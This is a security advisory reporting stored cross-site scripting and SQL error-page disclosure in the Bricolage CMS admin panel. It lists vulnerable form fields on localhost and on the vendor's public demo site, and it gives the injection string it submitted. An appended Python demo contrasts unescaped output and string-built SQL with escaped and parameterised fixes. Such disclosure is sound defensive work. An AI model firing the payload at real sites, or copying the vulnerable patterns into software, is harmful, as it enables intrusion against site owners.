TITLE: Bricolage CMS Admin panel Multiple stored XSS, SQL error pages
vendor: Bricolage CMS
Author: r007k17-w a.k.a Raghavendra Karthik.D
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Download Link: http://bricolagecms.org/downloads/
Versions: 1.*.*/2*
Tested on: Windows7
-------------------------------------------------------------------------------

DEMO:

A) Persistent XSS

1. http://localhost/admin/profile/output_channel/
   DEMO: http://demo.bricolagecms.org/admin/profile/output_channel/
   In 'Name' and 'Description' field, POST DATA= "'-->>

2. http://localhost/admin/profile/source/
   DEMO: http://demo.bricolagecms.org/admin/profile/source/
   In 'Source Name' and 'description' field, POST DATA= "'-->>

B) SQL error pages on reflected XSS/malicious char (Info Disclosure)

1. http://localhost/admin/profile/element_type/
   Demo: http://demo.bricolagecms.org/admin/profile/element_type/
   In 'Source Name' and 'description' field, POST DATA= "'-->>
-------------------------------------------------------------------------------

gr33t1ngs and ShOuTZ to s1d3-3ff3cts, crusi, s1l3n7 4ss4s1n and my friends
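As an added illustration that is not part of this advisory and not Bricolage's own Perl/Mason code, the two defect classes the PoC exercises are shown in Python: a stored field value dropped into HTML unescaped beside the escaped form, and a string-built lookup that returns the raw database error to the user beside a bound-parameter lookup that logs the failure and returns a generic page. The table, column names and error text are constructed for the demo and assume nothing about Bricolage's schema.

```python
import html
import logging
import sqlite3

# Constructed test string: the value the advisory submits in the Name/Description fields.
PAYLOAD = "\"'-->>"


def render_vulnerable(name: str, description: str) -> str:
    """Stored field values interpolated straight into the page: the stored-XSS sink."""
    return f'<input name="name" value="{name}"><p>{description}</p>'


def render_fixed(name: str, description: str) -> str:
    """html.escape (quote=True by default) neutralises " ' < > & in attribute and text contexts."""
    return (f'<input name="name" value="{html.escape(name)}">'
            f'<p>{html.escape(description)}</p>')


def _db() -> sqlite3.Connection:
    # Constructed in-memory table standing in for the element_type profile store.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE element_type (name TEXT, description TEXT)")
    return conn


def lookup_vulnerable(name: str) -> str:
    """String-built query: a stray quote breaks the SQL and the DB error text becomes the page."""
    conn = _db()
    try:
        rows = conn.execute(
            f"SELECT description FROM element_type WHERE name = '{name}'").fetchall()
        return f"found {len(rows)}"
    except sqlite3.Error as exc:
        return f"SQL error: {exc}"  # information disclosure: driver/schema detail leaks to the client


def lookup_fixed(name: str) -> str:
    """Bound parameter, so input never alters the statement; failures are logged, not shown."""
    conn = _db()
    try:
        rows = conn.execute(
            "SELECT description FROM element_type WHERE name = ?", (name,)).fetchall()
        return f"found {len(rows)}"
    except sqlite3.Error:
        logging.exception("element_type lookup failed")  # detail stays server-side
        return "An internal error occurred."


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD, PAYLOAD))
    print(render_fixed(PAYLOAD, PAYLOAD))
    print(lookup_vulnerable("'"), "|", lookup_fixed("'"))
```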